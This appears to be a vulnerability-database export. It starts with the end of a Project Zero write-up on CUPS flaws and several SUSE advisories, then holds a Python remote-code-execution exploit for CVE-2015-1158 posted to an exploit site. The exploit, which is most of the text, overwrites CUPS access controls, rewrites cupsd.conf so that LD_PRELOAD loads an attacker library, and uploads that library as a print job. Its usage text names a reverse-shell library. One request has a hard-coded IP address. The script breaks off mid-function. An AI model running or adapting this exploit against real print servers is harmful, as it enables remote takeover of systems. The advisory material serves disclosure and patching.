attacker. Printer names are not sensitive information, and can be incidentally exposed via other CUPS components like the browser. Knowing a printer name is a basic requirement to print anything.\n\n \n\n\nIf the attacker does not know a printer name from some other means, the names of all printers on a machine can be retrieved via the 'CUPS-Get-Printers' operation. 
This operation is not explicitly mentioned in the default configuration file, and therefore is not explicitly restricted (similar to 'Create-Job' or 'Print-Job').\n\n \n\n\n## Browsers Can Talk IPP\n\n \n\n\nThe same-origin policy is an important security barrier that prevents an attacker from meaningfully interacting directly with cupsd while a user browses the web.\n\n \n\n\nUsers who have the CUPS 'WebInterface' disabled are not susceptible to the specific reflected XSS issue.\n\n \n\n\nIn theory, universal XSS bugs in browser components could be used in place of this specific XSS to exploit otherwise-unreachable CUPS instances. Ultimately, this is simply to be expected, since IPP is just HTTP at the transport layer.\n\n \n\n\nAbsent same-origin policy restrictions, an attacker could exploit this vulnerability with standard features of the XMLHttpRequest class in browsers.\n\n \n\n\nA universal XSS could theoretically exploit this bug if it allowed an attacker to do the following:\n\n * Send POST requests cross-origin to localhost:631.\n\n * Specify binary contents in the POST bodies.\n\n * Set the 'Content-Type' header to 'application/ipp'.\n\n * Receive the response body contents from the cupsd server.\n\n \n\n\n## Browser XSS Inspectors\n\n \n\n\nSome browsers, such as Chrome, contain detection for reflected XSS attacks. These features look for client request content that is echoed back verbatim in a server's reply. In general, these XSS detectors are not considered a credible security barrier, but rather a defense-in-depth mechanism. In this case, they appear effective, at least for some templates.\n\n## CUPS and Browser Sandboxes\n\n \n\n\nMany browser sandboxes provide a privileged supervisor that performs HTTP requests on behalf of an unprivileged (potentially untrusted) child process. 
When enforcement of same-origin-policy restrictions is left to the child process, a compromised child could request that the supervisor send HTTP POST requests to 'cupsd' locally, exploiting it and breaking out of the sandbox.\n\n## CUPS May be Used in Unexpected Places\n\n \n\n\nThe exposure of CUPS running on desktop and network print servers is discussed at length, and easily anticipated and patched. However, CUPS may be embedded in unexpected places, where one might not even think to patch it.\n\n \n\n\nFor example, CUPS has been adapted for use in OpenWRT:\n\n[http://wiki.openwrt.org/doc/howto/cups.server](<http://wiki.openwrt.org/doc/howto/cups.server>)\n\n \n\n\n## Disabling the Web Interface\n\n \n\n\nThe CUPS web interface can be disabled by the 'WebInterface' configuration setting. This is a significant attack-surface reduction, and already the default on Mac OS X. On Linux systems it must be disabled manually:\n\n \n\n\n# Web interface setting...\n\nWebInterface No\n\n# Upstream Fixes\n\n \n\n\nApple Fix (April 16, 2015):\n\n[https://support.apple.com/kb/DL1807](<https://support.apple.com/kb/DL1807>)\n\n \n\n\nOfficial CUPS fix for downstream vendors (June 8, 2015):\n\n[https://www.cups.org/str.php?L4609](<https://www.cups.org/str.php?L4609>)\n\n[http://www.cups.org/blog.php?L1082+I0+Q](<http://www.cups.org/blog.php?L1082+I0+Q>)\n\n \n\n\n# Project Zero Bug\n\n \n\n\nFor those interested, the sample exploit can be [found here](<https://code.google.com/p/google-security-research/issues/detail?id=455>).\n\n# Disclosure Timeline\n\n \n\n\n * March 20th, 2015 - Initial notification to Apple\n\n * April 16th, 2015 - Apple ships fix in Mac OS X 10.10.3\n\n * June 8th, 2015 - CUPS ships official fix in CUPS 2.0.3\n\n * June 18th, 2015 - Disclosure + 90 days\n\n * June 19th, 2015 - P0 publication\n\n \n\n\n# Attack Surface Reduction in CUPS 2.0.3+\n\n \n\n\nCUPS 2.0.3 and 2.1 beta contain several prescient implementation changes to limit the risk and 
impact of future similar bugs:\n\n \n\n\n * Configuration value strings are now logically separated from the string pool, allocated by strdup() instead.\n\n * LD_* and DYLD_* environment variables are blocked when CUPS is running as root.\n\n * The localhost listener is removed when 'WebInterface' is disabled (2.1 beta only).\n\n# Acknowledgements\n\n \n\n\nThanks to Ben Hawkes, Stephan Somogyi, and Mike Sweet for their comments and edits.\n\n# Conclusion\n\n \n\n\nNo one prints anything anymore anyways.\n", "modified": "2015-06-19T00:00:00", "published": "2015-06-19T00:00:00", "id": "GOOGLEPROJECTZERO:5311581F0C084F98DDCD44AEF83A28A7", "href": "https://googleprojectzero.blogspot.com/2015/06/owning-internet-printing-case-study-in.html", "type": "googleprojectzero", "title": "\nOwning Internet Printing - A Case Study in Modern Software Exploitation\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2016-09-04T12:36:14", "bulletinFamily": "unix", "cvelist": ["CVE-2015-1158", "CVE-2012-5519", "CVE-2015-1159"], "description": "The following issues are fixed by this update:\n\n * CVE-2012-5519: privilege escalation via cross-site scripting and bad\n print job submission used to replace cupsd.conf on server (bsc#924208).\n * CVE-2015-1158: Improper Update of Reference Count\n * CVE-2015-1159: Cross-Site Scripting\n\n", "edition": 1, "modified": "2015-06-11T19:04:58", "published": "2015-06-11T19:04:58", "id": "SUSE-SU-2015:1044-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-06/msg00006.html", "type": "suse", "title": "Security update for cups154 (critical)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:47:49", "bulletinFamily": "unix", "cvelist": ["CVE-2015-1158", "CVE-2012-5519", "CVE-2015-1159"], "description": "The following issues are fixed by this update:\n\n * CVE-2012-5519: privilege escalation via cross-site scripting 
and bad\n print job submission used to replace cupsd.conf on server (bsc#924208).\n * CVE-2015-1158: Improper Update of Reference Count\n * CVE-2015-1159: Cross-Site Scripting\n\n", "edition": 1, "modified": "2015-06-11T20:06:22", "published": "2015-06-11T20:06:22", "id": "SUSE-SU-2015:1044-2", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-06/msg00008.html", "title": "Security update for cups154 (critical)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:30:36", "bulletinFamily": "unix", "cvelist": ["CVE-2015-1158", "CVE-2012-5519", "CVE-2015-1159"], "description": "This update fixes the following issues:\n\n - CVE-2015-1158 and CVE-2015-1159 fixes a possible privilege escalation\n via cross-site scripting and bad print job submission used to replace\n cupsd.conf on server (CUPS STR#4609 CERT-VU-810572 CVE-2015-1158\n CVE-2015-1159 bugzilla.suse.com bsc#924208). In general it is crucial to\n limit access to CUPS to trustworthy users who do not misuse their\n permission to submit print jobs which means to upload arbitrary data\n onto the CUPS server, see\n https://en.opensuse.org/SDB:CUPS_and_SANE_Firewall_settings and cf. 
the\n entries about CVE-2012-5519 below.\n\n", "edition": 1, "modified": "2015-06-12T21:05:05", "published": "2015-06-12T21:05:05", "id": "OPENSUSE-SU-2015:1056-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-06/msg00010.html", "type": "suse", "title": "Security update for cups (critical)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:26:30", "bulletinFamily": "unix", "cvelist": ["CVE-2015-1158", "CVE-2012-5519", "CVE-2015-1159"], "description": "The following issues are fixed by this update:\n\n * CVE-2012-5519: privilege escalation via cross-site scripting and bad\n print job submission used to replace cupsd.conf on server (bsc#924208).\n * CVE-2015-1158: Improper Update of Reference Count\n * CVE-2015-1159: Cross-Site Scripting\n\n", "edition": 1, "modified": "2015-06-11T17:05:04", "published": "2015-06-11T17:05:04", "id": "SUSE-SU-2015:1041-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-06/msg00003.html", "type": "suse", "title": "Security update for cups (critical)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-01-08T23:03:57", "description": "Exploit for linux platform in category remote exploits", "edition": 1, "published": "2017-02-03T00:00:00", "title": "CUPS 2.0.3 - Remote Command Execution Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-1158"], "modified": "2017-02-03T00:00:00", "href": "https://0day.today/exploit/description/26891", "id": "1337DAY-ID-26891", "sourceData": "#!/usr/bin/python\r\n# Exploit Title: CUPS Reference Count Over Decrement Remote Code Execution\r\n# Google Dork: n/a\r\n# Date: 2/2/17\r\n# Exploit Author: @0x00string\r\n# Vendor Homepage: cups.org\r\n# Software Link: https://github.com/apple/cups/releases/tag/release-2.0.2\r\n# Version: <2.0.3\r\n# Tested on: Ubuntu 14/15\r\n# CVE : 
CVE-2015-1158\r\nimport os, re, socket, random, time, getopt, sys\r\nfrom socket import *\r\nfrom struct import *\r\n \r\ndef banner():\r\n print '''\r\n lol ty google\r\n 0000000000000\r\n 0000000000000000000 00\r\n 00000000000000000000000000000\r\n 0000000000000000000000000000000\r\n 000000000 0000000000\r\n 00000000 0000000000\r\n 0000000 000000000000\r\n 0000000 000000000000000\r\n 000000 000000000 000000\r\n0000000 000000000 000000\r\n000000 000000000 000000\r\n000000 000000000 000000\r\n000000 00000000 000000\r\n000000 000000000 000000\r\n0000000 000000000 0000000\r\n 000000 000000000 000000\r\n 0000000000000000 0000000\r\n 0000000000000 0000000\r\n 00000000000 00000000\r\n 00000000000 000000000\r\n 0000000000000000000000000000000\r\n 00000000000000000000000000000\r\n 000 0000000000000000000\r\n 0000000000000\r\n @0x00string\r\ngithub.com/0x00string/oldays/CVE-2015-1158.py\r\n'''\r\n \r\ndef usage ():\r\n print (\"python script.py <args>\\n\"\r\n \" -h, --help: Show this message\\n\"\r\n \" -a, --rhost: Target IP address\\n\"\r\n \" -b, --rport: Target IPP service port\\n\"\r\n \" -c, --lib /path/to/payload.so\\n\"\r\n \" -f, --stomp-only Only stomp the ACL (no postex)\\n\"\r\n \"\\n\"\r\n \"Examples:\\n\"\r\n \"python script.py -a 10.10.10.10 -b 631 -f\\n\"\r\n \"python script.py -a 10.10.10.10 -b 631 -c /tmp/x86reverseshell.so\\n\")\r\n exit()\r\n \r\ndef pretty (t, m):\r\n if (t is \"+\"):\r\n print \"\\x1b[32;1m[+]\\x1b[0m\\t\" + m + \"\\n\",\r\n elif (t is \"-\"):\r\n print \"\\x1b[31;1m[-]\\x1b[0m\\t\" + m + \"\\n\",\r\n elif (t is \"*\"):\r\n print \"\\x1b[34;1m[*]\\x1b[0m\\t\" + m + \"\\n\",\r\n elif (t is \"!\"):\r\n print \"\\x1b[33;1m[!]\\x1b[0m\\t\" + m + \"\\n\",\r\n \r\ndef createDump (input):\r\n d, b, h = '', [], []\r\n u = list(input)\r\n for e in u:\r\n h.append(e.encode(\"hex\"))\r\n if e == '0x0':\r\n b.append('0')\r\n elif 30 > ord(e) or ord(e) > 128:\r\n b.append('.')\r\n elif 30 < ord(e) or ord(e) < 128:\r\n b.append(e)\r\n \r\n i = 
0\r\n while i < len(h):\r\n if (len(h) - i ) >= 16:\r\n d += ' '.join(h[i:i+16])\r\n d += \" \"\r\n d += ' '.join(b[i:i+16])\r\n d += \"\\n\"\r\n i = i + 16\r\n else:\r\n d += ' '.join(h[i:(len(h) - 0 )])\r\n pad = len(' '.join(h[i:(len(h) - 0 )]))\r\n d += ' ' * (56 - pad)\r\n d += ' '.join(b[i:(len(h) - 0 )])\r\n d += \"\\n\"\r\n i = i + len(h)\r\n \r\n return d\r\n \r\nclass tcpsock:\r\n def __init__(self, sock=None):\r\n if sock is None:\r\n self.sock = socket(\r\n AF_INET, SOCK_STREAM)\r\n self.sock.settimeout(30)\r\n else:\r\n self.sock = sock\r\n def connect(self, host, port):\r\n self.sock.connect((host, int(port)))\r\n def tx(self, msg):\r\n self.sock.send(msg)\r\n def rx(self):\r\n tmp = self.sock.recv(1024)\r\n msg = \"\"\r\n while tmp:\r\n msg += tmp\r\n tmp = self.sock.recv(1024)\r\n return msg\r\n \r\ndef txrx (ip, port, proto, txpacket):\r\n if (proto is \"tcp\"):\r\n sock = tcpsock()\r\n elif (proto is \"udp\"):\r\n sock = udpsock()\r\n else:\r\n return None\r\n sock.connect(ip, port)\r\n sock.tx(txpacket)\r\n rxpacket = sock.rx()\r\n return rxpacket\r\n \r\ndef locatePrinters(rhost, rport=\"631\"):\r\n request = ( \"GET /printers HTTP/1.1\\x0d\\x0a\"\r\n \"Host: \" + rhost + \":\" + rport + \"\\x0d\\x0a\"\r\n \"User-Agent: CUPS/2.0.2\\x0d\\x0a\"\r\n \"Connection: Close\\x0d\\x0a\"\r\n \"\\x0d\\x0a\")\r\n response = txrx(rhost, int(rport), \"tcp\", request)\r\n if response is not None:\r\n m = re.search('<TR><TD><A HREF=\"(.+)\">.+</A></TD><TD>.+</TD><TD></TD><TD>.+</TD><TD>', response)\r\n if m is not None:\r\n printer = m.group(1)\r\n pretty(\"+\",\"printer found: \" + printer)\r\n else:\r\n pretty(\"-\",\"no printers\")\r\n exit(1)\r\n return printer\r\n \r\ndef preparePayload(libpath):\r\n with open(libpath, 'rb') as f:\r\n payload = f.read()\r\n if payload is not None:\r\n pretty(\"*\",\"Payload:\\n\" + createDump(payload))\r\n else:\r\n pretty(\"-\",\"something went wrong\")\r\n usage()\r\n return payload\r\n \r\ndef seedTarget(rhost, rport, 
printer, payload):\r\n i = random.randint(1,3)\r\n reqid = str(pack(\">i\",(i+2)))\r\n reqid2 = str(pack(\">i\",(i+3)))\r\n printer_uri = \"ipp://\" + rhost + \":\" + str(rport) + printer\r\n \r\n create_job_packet = (\"\\x02\\x00\"\r\n \"\\x00\\x05\"+\r\n reqid+\r\n \"\\x01\"\r\n \"\\x47\"+\"\\x00\\x12\"+\"attributes-charset\"+\"\\x00\\x05\"+\"utf-8\"\r\n \"\\x48\"+\"\\x00\\x1b\"+\"attributes-natural-language\"+\"\\x00\\x05\"+\"en-us\"\r\n \"\\x45\"+\"\\x00\\x0b\"+\"printer-uri\" + str(pack(\">h\", len(printer_uri))) + printer_uri +\r\n \"\\x42\"+\"\\x00\\x14\"+\"requesting-user-name\"+\"\\x00\\x04\"+\"root\"\r\n \"\\x42\"+\"\\x00\\x08\"+\"job-name\"+\"\\x00\\x06\"+\"badlib\"\r\n \"\\x02\"\r\n \"\\x21\"+\"\\x00\\x06\"+\"copies\"+\"\\x00\\x04\"+\"\\x00\\x00\\x00\\x01\"\r\n \"\\x23\"+\"\\x00\\x0a\"+\"finishings\"+\"\\x00\\x04\"+\"\\x00\\x00\\x00\\x03\"\r\n \"\\x42\"+\"\\x00\\x10\"+\"job-cancel-after\"+\"\\x00\\x05\"+\"\\x31\\x30\\x38\\x30\\x30\"\r\n \"\\x44\"+\"\\x00\\x0e\"+\"job-hold-until\"+\"\\x00\\x0a\"+\"indefinite\"\r\n \"\\x21\"+\"\\x00\\x0c\"+\"job-priority\"+\"\\x00\\x04\"+\"\\x00\\x00\\x00\\x32\"\r\n \"\\x42\"+\"\\x00\\x0a\"+\"job-sheets\"+\"\\x00\\x04\"+\"none\"+\"\\x42\"+\"\\x00\\x00\\x00\\x04\"+\"none\"\r\n \"\\x21\"+\"\\x00\\x09\"+\"number-up\"+\"\\x00\\x04\"+\"\\x00\\x00\\x00\\x01\"\r\n \"\\x03\")\r\n pretty(\"*\",\"Sending createJob\")\r\n \r\n http_header1 = ( \"POST \" + printer + \" HTTP/1.1\\x0d\\x0a\"\r\n \"Content-Type: application/ipp\\x0d\\x0a\"\r\n \"Host: \" + rhost + \":\" + str(rport) + \"\\x0d\\x0a\"\r\n \"User-Agent: CUPS/2.0.2\\x0d\\x0a\"\r\n \"Connection: Close\\x0d\\x0a\"\r\n \"Content-Length: \" + str(len(create_job_packet) + 0) + \"\\x0d\\x0a\"\r\n \"\\x0d\\x0a\")\r\n \r\n createJobRequest = http_header1 + create_job_packet\r\n blah = txrx(rhost,int(rport),\"tcp\",createJobRequest)\r\n if blah is not None:\r\n m = re.search(\"ipp://\" + rhost + \":\" + str(rport) + \"/jobs/(\\d+)\",blah)\r\n if m is not None:\r\n jobid = 
m.group(1)\r\n else:\r\n pretty(\"-\",\"something went wrong\");\r\n exit()\r\n \r\n pretty(\"*\",\"\\n\" + createDump(blah) + \"\\n\")\r\n pretty(\"*\", \"Sending sendJob\")\r\n \r\n send_document_packet = (\"\\x02\\x00\"\r\n \"\\x00\\x06\"+\r\n reqid2+\r\n \"\\x01\"\r\n \"\\x47\"+\"\\x00\\x12\"+\"attributes-charset\"+\"\\x00\\x05\"+\"utf-8\"\r\n \"\\x48\"+\"\\x00\\x1b\"+\"attributes-natural-language\"+\"\\x00\\x05\"+\"en-us\"\r\n \"\\x45\"+\"\\x00\\x0b\"+\"printer-uri\" + str(pack(\">h\", len(printer_uri))) + printer_uri +\r\n \"\\x21\"+\"\\x00\\x06\"+\"job-id\"+\"\\x00\\x04\"+ str(pack(\">i\", int(jobid))) +\r\n \"\\x42\"+\"\\x00\\x14\"+\"requesting-user-name\"+\"\\x00\\x04\"+\"root\"\r\n \"\\x42\"+\"\\x00\\x0d\"+\"document-name\"+\"\\x00\\x06\"+\"badlib\"\r\n \"\\x49\"+\"\\x00\\x0f\"+\"document-format\"+\"\\x00\\x18\"+\"application/octet-stream\"\r\n \"\\x22\"+\"\\x00\\x0d\"+\"last-document\"+\"\\x00\\x01\"+\"\\x01\"\r\n \"\\x03\"+\r\n payload)\r\n \r\n http_header2 = ( \"POST \" + printer + \" HTTP/1.1\\x0d\\x0a\"\r\n \"Content-Type: application/ipp\\x0d\\x0a\"\r\n \"Host: \" + rhost + \":\" + str(rport) + \"\\x0d\\x0a\"\r\n \"User-Agent: CUPS/2.0.2\\x0d\\x0a\"\r\n \"Connection: Close\\x0d\\x0a\"\r\n \"Content-Length: \" + str(len(send_document_packet) + 0) + \"\\x0d\\x0a\"\r\n \"\\x0d\\x0a\")\r\n \r\n sendJobRequest = http_header2 + send_document_packet\r\n blah2 = txrx(\"172.20.32.3\",631,\"tcp\",sendJobRequest)\r\n pretty(\"*\",\"\\n\" + createDump(blah) + \"\\n\")\r\n pretty(\"*\",\"job id: \" + jobid)\r\n return jobid\r\n \r\ndef stompACL(rhost, rport, printer):\r\n i = random.randint(1,1024)\r\n printer_url = \"ipp://\" + rhost + \":\" + rport + printer\r\n \r\n admin_stomp = (\"\\x02\\x00\" # vers 2.0\r\n \"\\x00\\x05\"+ # op id: Create Job (0x0005)\r\n str(pack(\">i\",(i+1)))+\r\n \"\\x01\" # op attributes marker\r\n \"\\x47\" # charset\r\n \"\\x00\\x12\" # name len: 18\r\n \"attributes-charset\"\r\n \"\\x00\\x08\" # val len: 8\r\n \"us-ascii\"\r\n 
\"\\x48\" # natural language\r\n \"\\x00\\x1b\" # name len: 27\r\n \"attributes-natural-language\"\r\n \"\\x00\\x06\" # val len: 6\r\n \"/admin\"\r\n \"\\x45\" # printer-uri\r\n \"\\x00\\x0b\" # name len 11\r\n \"printer-uri\" +\r\n str(pack(\">h\", len(printer_url))) + printer_url +\r\n \"\\x42\" # name without lang\r\n \"\\x00\\x14\" # name len: 20\r\n \"requesting-user-name\"\r\n \"\\x00\\x06\" # val len: 6\r\n \"/admin\"\r\n \"\\x02\" # job attrs marker\r\n \"\\x21\" # integer\r\n \"\\x00\\x06\" # name len: 6\r\n \"copies\"\r\n \"\\x00\\x04\" # val len: 4\r\n \"\\x00\\x00\\x00\\x01\" # 1\r\n \"\\x42\" # name w/o lang\r\n \"\\x00\\x19\" # name len: 25\r\n \"job-originating-host-name\"\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x36\" # nwl\r\n \"\\x00\\x00\" # name len: 0\r\n 
\"\\x00\\x16\" # val len: 22\r\n \"\\x00\\x06\" # length\r\n \"/admin\"\r\n \"\\x00\\x0c\"\r\n \"BBBBBBBBBBBB\"\r\n \"\\x03\") # end of attributes\r\n \r\n conf_stomp = (\"\\x02\\x00\" # vers 2.0\r\n \"\\x00\\x05\"+ # op id: Create Job (0x0005)\r\n str(pack(\">i\",(i+2)))+\r\n \"\\x01\" # op attributes marker\r\n \"\\x47\" # charset\r\n \"\\x00\\x12\" # name len: 18\r\n \"attributes-charset\"\r\n \"\\x00\\x08\" # val len: 8\r\n \"us-ascii\"\r\n \"\\x48\" # natural language\r\n \"\\x00\\x1b\" # name len: 27\r\n \"attributes-natural-language\"\r\n \"\\x00\\x0b\" # val len: 11\r\n \"/admin/conf\"\r\n \"\\x45\" # printer-uri\r\n \"\\x00\\x0b\" # name len 11\r\n \"printer-uri\" +\r\n str(pack(\">h\", len(printer_url))) + printer_url +\r\n \"\\x42\" # name without lang\r\n \"\\x00\\x14\" # name len: 20\r\n \"requesting-user-name\"\r\n \"\\x00\\x0b\" # val len: 11\r\n \"/admin/conf\"\r\n \"\\x02\" # job attrs marker\r\n \"\\x21\" # integer\r\n \"\\x00\\x06\" # name len: 6\r\n \"copies\"\r\n \"\\x00\\x04\" # val len: 4\r\n \"\\x00\\x00\\x00\\x01\" # 1\r\n \"\\x42\" # name w/o lang\r\n \"\\x00\\x19\" # name len: 25\r\n \"job-originating-host-name\"\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n 
\"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x36\" # nwl\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x1b\" # val len: 27\r\n \"\\x00\\x0b\" # length\r\n \"/admin/conf\"\r\n \"\\x00\\x0c\"\r\n \"BBBBBBBBBBBB\"\r\n \"\\x03\") # end of attributes\r\n \r\n http_header1 = (\"POST \" + printer + \" HTTP/1.1\\x0d\\x0a\"\r\n \"Content-Type: application/ipp\\x0d\\x0a\"\r\n \"Host: \" + rhost + \":\" + rport + \"\\x0d\\x0a\"\r\n \"User-Agent: CUPS/2.0.2\\x0d\\x0a\"\r\n \"Connection: Close\\x0d\\x0a\"\r\n \"Content-Length: \" + str(len(admin_stomp)) + \"\\x0d\\x0a\"\r\n \"\\x0d\\x0a\")\r\n \r\n http_header2 = (\"POST \" + printer + \" HTTP/1.1\\x0d\\x0a\"\r\n \"Content-Type: application/ipp\\x0d\\x0a\"\r\n \"Host: \" + rhost + \":\" + rport + \"\\x0d\\x0a\"\r\n \"User-Agent: CUPS/2.0.2\\x0d\\x0a\"\r\n \"Connection: Close\\x0d\\x0a\"\r\n \"Content-Length: \" + str(len(conf_stomp)) + \"\\x0d\\x0a\"\r\n \"\\x0d\\x0a\")\r\n \r\n pretty(\"*\",\"stomping ACL\")\r\n pretty(\"*\",\">:\\n\" + createDump(http_header1 + admin_stomp))\r\n pretty(\"*\",\"<:\\n\" + createDump(txrx(rhost,rport,\"tcp\",http_header1 + admin_stomp)))\r\n time.sleep(1)\r\n pretty(\"*\",\">:\\n\" + createDump(http_header2 + conf_stomp))\r\n pretty(\"*\",\"<:\\n\" + createDump(txrx(rhost,rport,\"tcp\",http_header2 + conf_stomp)))\r\n \r\n http_header_check = (\"GET /admin HTTP/1.1\\x0d\\x0a\"\r\n \"Host: \" + rhost + \":\" + rport + \"\\x0d\\x0a\"\r\n \"User-Agent: CUPS/2.0.2\\x0d\\x0a\"\r\n \"Connection: Close\\x0d\\x0a\"\r\n \"\\x0d\\x0a\")\r\n pretty(\"*\",\"checking /admin\")\r\n pretty(\"*\",\">:\\n\" + createDump(http_header_check))\r\n res = 
txrx(rhost,rport,\"tcp\",http_header_check)\r\n pretty(\"*\",\"<:\\n\" + createDump(res))\r\n m = re.search('200 OK', res)\r\n if m is not None:\r\n pretty(\"+\",\"ACL stomp successful\")\r\n else:\r\n pretty(\"-\",\"exploit failed\")\r\n exit(1)\r\n \r\n \r\ndef getConfig(rhost, rport):\r\n i = random.randint(1,1024)\r\n original_config = \"\"\r\n http_request = (\"GET /admin/conf/cupsd.conf HTTP/1.1\\x0d\\x0a\"\r\n \"Host: \" + rhost + \":\" + rport + \"\\x0d\\x0a\"\r\n \"User-Agent: CUPS/2.0.2\\x0d\\x0a\"\r\n \"Connection: Close\\x0d\\x0a\"\r\n \"\\x0d\\x0a\")\r\n \r\n pretty(\"*\",\"grabbing configuration file....\")\r\n res = txrx(rhost,rport,\"tcp\",http_request)\r\n res_array = res.split(\"\\x0d\\x0a\\x0d\\x0a\")\r\n original_config = res_array[1]\r\n pretty(\"*\",\"config:\\n\" + original_config + \"\\n\")\r\n return original_config\r\n \r\ndef putConfig(rhost, rport, config):\r\n http_request = (\"PUT /admin/conf/cupsd.conf HTTP/1.1\\x0d\\x0a\"\r\n \"Content-Type: application/ipp\\x0d\\x0a\"\r\n \"Host: \" + rhost + \":\" + rport + \"\\x0d\\x0a\"\r\n \"User-Agent: CUPS/2.0.2\\x0d\\x0a\"\r\n \"Connection: Keep-Alive\\x0d\\x0a\"\r\n \"Content-Length: \" + str(len(config)) + \"\\x0d\\x0a\"\r\n \"\\x0d\\x0a\")\r\n pretty(\"*\",\"overwriting config...\")\r\n pretty(\"*\",\">:\\n\" + createDump(http_request + config))\r\n pretty(\"*\",\"<:\\n\" + createDump(txrx(rhost,rport,\"tcp\",http_request + config)))\r\n \r\ndef poisonConfig(config, name):\r\n config = config + \"\\x0a\\x0aSetEnv LD_PRELOAD /var/spool/cups/d00\" + name + \"-001\\x0a\"\r\n return config\r\n \r\ndef main():\r\n rhost = None;\r\n noshell = None;\r\n options, remainder = getopt.getopt(sys.argv[1:], 'a:b:c:f:h:', ['rhost=','rport=','lib=','stomp-only','help',])\r\n for opt, arg in options:\r\n if opt in ('-h', '--help'):\r\n usage()\r\n elif opt in ('-a','--rhost'):\r\n rhost = arg;\r\n elif opt in ('-b','--rport'):\r\n rport = arg;\r\n elif opt in ('-c','--lib'):\r\n libpath = arg;\r\n elif 
